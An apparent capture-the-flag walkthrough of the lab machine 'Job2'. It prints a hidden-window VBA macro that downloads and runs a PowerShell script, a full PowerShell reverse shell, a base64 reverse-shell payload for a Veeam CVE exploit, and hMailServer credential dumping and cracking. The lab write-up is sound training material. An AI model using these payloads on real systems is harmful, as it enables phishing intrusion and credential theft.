HackTheBoxActiveDirectoryWindowsVulnLabs

JobTwo

Phishing HR via SMTP with a macro-laced DOCM shells Julian. hMailServer DB decryption exposes Ferdinand's crackable hash. Evil-WinRM pivots laterally. CVE-2023-27532 against Veeam 10.0.1 gives SYSTEM.

Platform: VulnLab Machine: JOB2 IP: 10.129.238.35 Difficulty: Hard OS: Windows

1. Reconnaissance

Port Scan

An nmap service/version scan against the target reveals a rich Windows attack surface:

┌──(kali㉿kali)-[~]
└─$ nmap 10.129.238.35 -sCV 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-14 05:29 -0400
Stats: 0:04:18 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 88.64% done; ETC: 05:34 (0:00:17 remaining)
Nmap scan report for 10.129.238.35
Host is up (0.27s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT      STATE SERVICE              VERSION
22/tcp    open  ssh                  OpenSSH for_Windows_9.5 (protocol 2.0)
25/tcp    open  smtp                 hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
111/tcp   open  rpcbind
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   h2
|_  http/1.1
445/tcp   open  microsoft-ds?
1063/tcp  open  rpcbind
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
|_ssl-date: 2026-03-14T10:31:29+00:00; +59m58s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2025-10-26T11:44:40
|_Not valid after:  2026-04-27T11:44:40
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
10001/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10002/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10003/tcp open  storagecraft-image   StorageCraft Image Manager
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-03-14T10:30:50
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 332.52 seconds

Notable: the SMTP service accepts unauthenticated mail (AUTH LOGIN) which immediately stands out as an attack vector.

Web Enumeration

The HTTPS site at https://job2.vl hosts a job listing titled "Captain Wanted" — a boat rental company seeking a part-time fishing captain. The critical detail:

"If you are interested in this position, please send your CV to [email protected] as a Microsoft Word Document."

This is a classic macro-based phishing / red team scenario: an HR inbox is actively reading Word documents, making it ideal for a malicious macro payload.

2. Initial Foothold — Malicious DOCM via SMTP

Attack Plan

The objective is to craft a Word document (.docm) containing a VBA macro that calls back to our attack machine, and deliver it via the unauthenticated SMTP port to [email protected].

Step 1 — Craft the Macro

Create a .docm file with an AutoOpen macro. The macro uses WinExec (a low-level Win32 API call via kernel32) to silently run PowerShell and download a reverse shell script from our HTTP server:

Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long

Sub AutoOpen()
    WinExec "powershell.exe iex(iwr -uri http://10.10.16.5/shell.ps1 -UseBasicParsing)", 0
End Sub

AutoOpen executes automatically when the document is opened — no user interaction beyond clicking "Enable Macros".
uCmdShow = 0 hides the PowerShell window (SHOW_HIDE).
The payload is fetched over HTTP from our machine (10.10.16.5) at runtime.

Verify the macro is embedded correctly using olevba:

┌──(kali㉿kali)-[~]
└─$ sudo /root/.local/bin/olevba ~/Documents/job2/cv.docm
olevba 0.60.2 on Python 3.13.12 - http://decalage.info/python/oletools
===============================================================================
FILE: /home/kali/Documents/job2/cv.docm
Type: OpenXML
WARNING  For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas 
in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long

Sub AutoOpen()
    WinExec "powershell.exe iex(iwr -uri http://10.10.16.5/shell.ps1 -UseBasicParsing)", 0
End Sub

+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|Suspicious|shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|powershell          |May run PowerShell commands                  |
|Suspicious|Lib                 |May run code from a DLL                      |
|IOC       |http://10.10.16.5/sh|URL                                          |
|          |ell.ps1             |                                             |
|IOC       |10.10.16.5          |IPv4 address                                 |
|IOC       |powershell.exe      |Executable file name                         |
|IOC       |shell.ps1           |Executable file name                         |
+----------+--------------------+---------------------------------------------+

Step 2 — Host the Reverse Shell

The shell.ps1 is a standard PowerShell TCP reverse shell:

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Serve it on port 80:

┌──(kali㉿kali)-[~/Documents/job2]
└─$ python -m http.server 80                                     
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Step 3 — Set Up Listener

┌──(kali㉿kali)-[~/Documents/job2]
└─$ nc -lvnp 4444    
listening on [any] 4444 ...

Step 4 — Send the Email

Using sendemail to deliver the .docm to HR over the unauthenticated SMTP server:

┌──(kali㉿kali)-[~]
└─$ sendemail -s 10.129.238.35 \
  -f "applicant <[email protected]>" \
  -t [email protected] \
  -o tls=no \
  -m "Please find my CV attached." \
  -a ~/Documents/job2/cv.docm
Mar 14 07:33:38 kali sendemail[76997]: Email was sent successfully!

The HR bot automatically opens the attachment. Within seconds, our netcat listener receives a connection:

┌──(kali㉿kali)-[~/Documents/job2]
└─$ nc -lvnp 4444    
listening on [any] 4444 ...
connect to [10.10.16.5] from (UNKNOWN) [10.129.238.35] 54454
PS C:\Windows\system32> pwd
Path               
----               
C:\WINDOWS\system32

3. Post-Exploitation as Julian

Verify Access

Julian is a standard user (Medium Mandatory Level), member of Remote Desktop Users and BUILTIN\Users. No interesting privileges beyond the baseline.

PS C:\Users> whoami
job2\julian


PS C:\WINDOWS\system32> cd ../../Users/Julian


PS C:\Users> whoami /all

USER INFORMATION
----------------

User Name   SID                                           
=========== ==============================================
job2\julian S-1-5-21-3935782767-3829597994-1046841959-1000


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users           Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Process & Application Enumeration

Reviewing running processes and installed software reveals several key services:

SQL Server (sqlservr.exe, sqlbrowser.exe, sqlwriter.exe)
Veeam Backup & Replication (multiple services: Veeam.Backup.Service.exe, Veeam.Backup.Manager.exe, etc.)
hMailServer — visible in C:\Program Files (x86)\hMailServer

PS C:\Program Files (x86)> ls
    Directory: C:\Program Files (x86)
Mode                 LastWriteTime         Length Name                       ----                 -------------         ------ ----                       d-----        10/28/2025   5:21 PM                Common Files               d-----          5/3/2023   1:48 PM                hMailServer                d-----        10/27/2025   3:10 PM                Internet Explorer          d-----          5/3/2023   2:05 PM                LINQPad5                   d-----          5/7/2025   9:25 AM                Microsoft                  d-----        10/28/2025   5:23 PM                Microsoft Office           d-----          5/3/2023   6:15 PM                Microsoft SQL Server       d-----          5/3/2023   2:08 PM                Microsoft SQL Server Compact Edition                                 
d-----          5/3/2023   1:49 PM                Microsoft Synchronization Services                                   
d-----          5/3/2023   6:11 PM                Microsoft Visual Studio 14.0
d-----          5/3/2023   6:15 PM                Microsoft.NET              d-----          5/3/2023   1:43 PM                MSBuild                    d-----          5/3/2023   1:43 PM                Reference Assemblies       d-----          5/3/2023   6:47 PM                Veeam                      d-----          5/8/2021   9:35 AM                Windows Defender           d-----        10/27/2025   3:10 PM                Windows Mail               d-----        10/27/2025   3:10 PM                Windows Media Player       d-----          5/8/2021   9:35 AM                Windows NT                 d-----        10/27/2025   3:10 PM                Windows Photo Viewer       d-----          5/8/2021   8:34 AM                WindowsPowerShell

The combination of hMailServer and Veeam provides two distinct privilege escalation paths.

sqlservr.exe
sqlbrowser.exe
sqlwriter.exe

Veeam.Backup.Service.exe
Veeam.Backup.Manager.exe
Veeam.Backup.TransportSvc.exe
Veeam.Backup.CloudService.exe
Veeam.Backup.MountService.exe
Veeam.Backup.ExternalInfrastructureSvc.exe

4. Privilege Escalation — hMailServer Database

Reading the hMailServer Config

nothing interesting there, we'll see more of installed and running processes, in Program Files (x86) we see hMailServer, which we know is running from our previous nmap scan

The .ini file exposes:

PS C:\Program Files (x86)\hMailServer\Database> type "C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini"
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=8a53bc0c0c9733319e5ee28dedce038e
[Database]
Type=MSSQLCE
Username=
Password=4e9989caf04eaa5ef87fd1f853f08b62
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

Two hashes are present:

The admin UI password (MD5): 8a53bc0c0c9733319e5ee28dedce038e
The database encryption password (hMailServer proprietary encryption): 4e9989caf04eaa5ef87fd1f853f08b62

we get the admin hash from here let's try to crack it and use it to access hMailServer.sdf using the password

PS C:\Program Files (x86)\hMailServer> ls "C:\Program Files (x86)\hMailServer\Database"
    Directory: C:\Program Files (x86)\hMailServer\Database
Mode                 LastWriteTime         Length Name                       ----                 -------------         ------ ----                       -a----         3/14/2026  12:33 PM         675840 hMailServer.sdf

Decrypt the Database Password

The database password uses hMailServer's reversible XOR-based encryption. Using hmdecrypt (a .NET tool):

┌──(kali㉿kali)-[~/Documents/job2/hm_decrypt/hmdecrypt]
└─$ dotnet run -- dec 4e9989caf04eaa5ef87fd1f853f08b62
95C02068FD5D

Query the hMailServer Database (`.sdf`)

The database file is a SQL Server Compact Edition (.sdf) file. We load the appropriate DLL and query it directly from PowerShell on the target:

These are the DLLs required to talk to SQL-CE


PS C:\WINDOWS\system32> Get-ChildItem -Path "C:\Program Files" -Recurse -Filter "System.Data.SqlServerCe.dll" 2>$null


Directory: C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop
Mode                 LastWriteTime         Length Name                       ----                 -------------         ------ ----                       -a----         2/12/2010   4:20 AM         296816 System.Data.SqlServerCe.dll                                          


Directory: C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Private
Mode                 LastWriteTime         Length Name                       ----                 -------------         ------ ----                       -a----         2/12/2010   4:20 AM         296816 System.Data.SqlServerCe.dll                                          


Directory: C:\Program Files\Microsoft SQL Server Compact Edition\v4.0\Desktop
Mode                 LastWriteTime         Length Name                       ----                 -------------         ------ ----                       -a----          6/4/2012   1:29 PM         470240 System.Data.SqlServerCe.dll                                          


Directory: C:\Program Files\Microsoft SQL Server Compact Edition\v4.0\Private
Mode                 LastWriteTime         Length Name                       ----                 -------------         ------ ----                       -a----          6/4/2012   1:30 PM         470240 System.Data.SqlServerCe.dll

# Load the SQLCE library
PS C:\WINDOWS\system32> Add-Type -Path "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v4.0\Desktop\System.Data.SqlServerCe.dll"


# Copy to temp and upgrade the schema version
PS C:\WINDOWS\system32> copy "C:\Program Files (x86)\hMailServer\Database\hMailServer.sdf" C:\Windows\Temp\
PS C:\WINDOWS\system32> $engine = New-Object System.Data.SqlServerCe.SqlCeEngine("Data Source=C:\Windows\Temp\hMailServer.sdf;Password=95C02068FD5D")
PS C:\WINDOWS\system32> $engine.Upgrade("Data Source=C:\Windows\Temp\hMailServerUpgraded.sdf")


# Open connection
PS C:\WINDOWS\system32> $conn = New-Object System.Data.SqlServerCe.SqlCeConnection("Data Source=C:\\Windows\\Temp\\hMailServerUpgraded.sdf;Password=95C02068FD5D")
PS C:\WINDOWS\system32> try { $conn.Open() } catch { $_.Exception.Message }
PS C:\WINDOWS\system32> $conn.State
Open

# Dump account credentials
PS C:\WINDOWS\system32> $cmd = $conn.CreateCommand()
PS C:\WINDOWS\system32> $cmd.CommandText = "SELECT table_name FROM information_schema.tables"
PS C:\WINDOWS\system32> $reader = $cmd.ExecuteReader()

PS C:\WINDOWS\system32> while ($reader.Read()) { $reader["table_name"] }
hm_accounts
hm_acl
hm_aliases
hm_blocked_attachments
hm_dbversion
hm_distributionlists
hm_distributionlistsrecipients
hm_dnsbl
hm_domain_aliases
hm_domains
hm_fetchaccounts
hm_fetchaccounts_uids
hm_greylisting_triplets
hm_greylisting_whiteaddresses
hm_group_members
hm_groups
hm_imapfolders
hm_incoming_relays
hm_logon_failures
hm_message_metadata
hm_messagerecipients
hm_messages
hm_routeaddresses
hm_routes
hm_rule_actions
hm_rule_criterias
hm_rules
hm_securityranges
hm_servermessages
hm_settings
hm_sslcertificates
hm_surblservers
hm_tcpipports
hm_whitelist

PS C:\WINDOWS\system32> $cmd.CommandText = "SELECT column_name FROM information_schema.columns WHERE table_name = 'hm_accounts'"
PS C:\WINDOWS\system32> $reader = $cmd.ExecuteReader(); while ($reader.Read()) { $reader["column_name"] }; $reader.Close()
accountid
accountdomainid
accountadminlevel
accountaddress
accountpassword
accountactive
accountisad
accountaddomain
accountadusername
accountmaxsize
accountvacationmessageon
accountvacationmessage
accountvacationsubject
accountpwencryption
accountforwardenabled
accountforwardaddress
accountforwardkeeporiginal
accountenablesignature
accountsignatureplaintext
accountsignaturehtml
accountlastlogontime
accountvacationexpires
accountvacationexpiredate
accountpersonfirstname
accountpersonlastname

PS C:\WINDOWS\system32> $cmd.CommandText = "SELECT accountaddress, accountpassword FROM hm_accounts"

PS C:\WINDOWS\system32> $reader = $cmd.ExecuteReader(); while ($reader.Read()) { $reader["accountaddress"], $reader["accountpassword"] -join ":" }; $reader.Close()
[email protected]:8981c81abda0acadf1d12dd9d213bac7c51c022a34268058af3757607075e0eb49f76f
[email protected]:04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11
[email protected]:1a5adad158ccffd81db73db040c72109067add598fafc47bbbd92da9a69661af94f055

Results:

[email protected]:8981c81abda0acadf1d12dd9d213bac7c51c022a34268058af3757607075e0eb49f76f

[email protected]:04063d4de2e5d06721cfbd7a31390d02d18941d392e86aabe02eda181d9702838baa11

[email protected]:1a5adad158ccffd81db73db040c72109067add598fafc47bbbd92da9a69661af94f055

These are hMailServer SHA-256 salted hashes (format: sha256($salt.$password)).

Crack with John the Ripper

┌──(kali㉿kali)-[~/Documents/job2]
└─$ john --format=hmailserver --wordlist=/usr/share/wordlists/rockyou.txt usershash.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (hMailServer [sha256($s.$p) 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
Franzi123!       ([email protected])     
1g 0:00:00:03 DONE (2026-03-14 10:25) 0.3144g/s 4510Kp/s 12533Kc/s 12533KC/s !JD021803..*7¡Vamos!
Use the "--show --format=hMailServer" options to display all of the cracked passwords reliably
Session completed.

Cracked:

Account

Password

[email protected]

Franzi123!

5. Lateral Movement — Ferdinand via Evil-WinRM

Ferdinand's domain password reuses against the Windows local account. WinRM (port 5985) is open (and get the user flag):

┌──(kali㉿kali)-[~/Documents/job2]
└─$ evil-winrm -i 10.129.238.35 -u Ferdinand -p 'Franzi123!'
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> type ../Desktop/user.txt
ed99xxxxxxxxxxxxxxxxxxxxxxxxxf413b

6. Root — CVE-2023-27532 (Veeam Backup & Replication)

Identify the Veeam Version

*Evil-WinRM* PS C:\Program Files\Veeam\Backup and Replication> (Get-Item "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe").VersionInfo

ProductVersion   FileVersion      FileName
--------------   -----------      --------
10.0.1.4854      10.0.1.4854      C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe

Version 10.0.1.4854 is vulnerable to CVE-2023-27532 — an unauthenticated credential extraction vulnerability in Veeam Backup & Replication that allows any local (or network) user to extract credentials stored by the backup service, typically leading to SYSTEM execution.

The service listens on port 9401:

*Evil-WinRM* PS C:\Program Files\Veeam\Backup and Replication> netstat -ano | findstr 9401
  TCP    0.0.0.0:9401           0.0.0.0:0              LISTENING       3180

Exploit

Upload the pre-compiled exploit and its required DLL dependencies: this is the port running the Veeam backup service this is a pre-compiled binary for it.

we will upload these 4 files on our target machine

*Evil-WinRM* PS C:\Users\Ferdinand> upload VeeamHax.exe 
Info: Uploading /home/kali/Documents/job2/VeeamHax.exe to C:\Users\Ferdinand\VeeamHax.exe  
Data: 9556 bytes of 9556 bytes copied 
Info: Upload successful!

*Evil-WinRM* PS C:\Users\Ferdinand> upload Veeam.Backup.Common.dll  
Info: Uploading /home/kali/Documents/job2/Veeam.Backup.Common.dll to C:\Users\Ferdinand\Veeam.Backup.Common.dll       
Data: 2454976 bytes of 2454976 bytes copied 
Info: Upload successful!

*Evil-WinRM* PS C:\Users\Ferdinand> upload Veeam.Backup.Interaction.MountService.dll  
Info: Uploading /home/kali/Documents/job2/Veeam.Backup.Interaction.MountService.dll to C:\Users\Ferdinand\Veeam.Backup.Interaction.MountService.dll
Data: 573544 bytes of 573544 bytes copied   
Info: Upload successful!

*Evil-WinRM* PS C:\Users\Ferdinand> upload Veeam.Backup.Model.dll
Info: Uploading /home/kali/Documents/job2/Veeam.Backup.Model.dll to C:\Users\Ferdinand\Veeam.Backup.Model.dll
Data: 5925652 bytes of 5925652 bytes copied  
Info: Upload successful!

Start a netcat listener on port 8001, then run the exploit with a base64-encoded PowerShell reverse shell payload targeting the Veeam service on 127.0.0.1:9401:

*Evil-WinRM* PS C:\Users\Ferdinand> .\VeeamHax.exe --cmd "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAiACwAOAAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
Targeting 127.0.0.1:9401

The Veeam service runs as NT AUTHORITY\SYSTEM, so the injected command executes with full system privileges.

Shell caught:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 8001            
listening on [any] 8001 ...
connect to [10.10.16.5] from (UNKNOWN) [10.129.238.35] 55925
whoami
nt authority\system

PS C:\WINDOWS\system32> type C:\Users\Administrator\Desktop\root.txt
0fb1xxxxxxxxxxxxxxxxxxxxxxxxxx39df

7. Flags

Flag

Value

User (Ferdinand)

ed99xxxxxxxxxxxxxxxxxxxxxxxxxf413b

Root (Administrator)

0fb1xxxxxxxxxxxxxxxxxxxxxxxxxx39df

Attack Chain Summary

Nmap scan → SMTP open + job listing → Craft malicious .docm
    → Send CV to [email protected] → AutoOpen macro → Reverse shell (Julian)
        → Enumerate: hMailServer installed → Read .ini → Decrypt DB password
            → Query .sdf → Dump hashed credentials → Crack with JtR
                → Evil-WinRM as Ferdinand → User Flag
                    → Veeam 10.0.1.4854 (CVE-2023-27532) → SYSTEM shell → Root Flag

Key Techniques & Tools

Technique

Tool/Method

Network scanning

nmap -sCV

VBA macro analysis

olevba

Malicious document delivery

sendemail via unauthenticated SMTP

PowerShell reverse shell

TCP socket shell (shell.ps1)

hMailServer DB decryption

hmdecrypt (.NET)

SQL CE database querying

PowerShell + SqlServerCe.dll

Password cracking

john --format=hmailserver + rockyou.txt

WinRM shell

evil-winrm

Privilege escalation

CVE-2023-27532 (VeeamHax.exe)

PreviousFlight NextForest

Last updated 2 days ago

hashtag1. Reconnaissance

hashtagPort Scan

hashtagWeb Enumeration

hashtag2. Initial Foothold — Malicious DOCM via SMTP

hashtagAttack Plan

hashtagStep 1 — Craft the Macro

hashtagStep 2 — Host the Reverse Shell

hashtagStep 3 — Set Up Listener

hashtagStep 4 — Send the Email

hashtag3. Post-Exploitation as Julian

hashtagVerify Access

hashtagProcess & Application Enumeration

hashtag4. Privilege Escalation — hMailServer Database

hashtagReading the hMailServer Config

hashtagDecrypt the Database Password

hashtagQuery the hMailServer Database (.sdf)

hashtagCrack with John the Ripper

hashtag5. Lateral Movement — Ferdinand via Evil-WinRM

hashtag6. Root — CVE-2023-27532 (Veeam Backup & Replication)

hashtagIdentify the Veeam Version

hashtagExploit

hashtag7. Flags

hashtagAttack Chain Summary

hashtagKey Techniques & Tools